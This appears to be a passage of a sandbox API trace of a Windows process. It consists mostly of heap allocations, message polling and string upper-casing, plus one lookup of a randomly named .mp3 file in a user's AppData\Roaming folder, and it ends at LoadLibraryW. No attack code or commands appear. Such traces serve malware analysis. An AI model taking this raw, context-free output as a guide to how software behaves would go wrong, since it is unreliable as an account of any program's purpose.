[0196.368] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0196.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.368] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0196.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0196.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0196.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0196.369] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0196.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.369] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.370] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0196.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.370] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.370] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0196.371] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0196.371] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.372] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.372] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.372] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0196.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0196.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0196.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.373] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.373] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.373] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.414] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.414] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0196.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0196.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.415] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.415] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/CoWnh3Q5rTDnpXdJ.mp3", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedf9e5f0, ftCreationTime.dwHighDateTime=0x1d4d504, ftLastAccessTime.dwLowDateTime=0xe90312a0, ftLastAccessTime.dwHighDateTime=0x1d4c9c5, ftLastWriteTime.dwLowDateTime=0xe90312a0, ftLastWriteTime.dwHighDateTime=0x1d4c9c5, nFileSizeHigh=0x0, nFileSizeLow=0x174f, dwReserved0=0xa250039, dwReserved1=0x1298d, cFileName="CoWnh3Q5rTDnpXdJ.mp3", cAlternateFileName="COWNH3~1.MP3")) returned 0xaa58e0 [0196.415] FindClose (in: hFindFile=0xaa58e0 | out: hFindFile=0xaa58e0) returned 1 [0196.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.415] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.416] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0196.416] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0196.416] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.417] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.417] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.417] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0196.418] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.418] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.418] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.418] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0196.418] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.419] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.419] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.419] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.419] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.419] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0196.420] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.420] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.420] LoadLibraryW 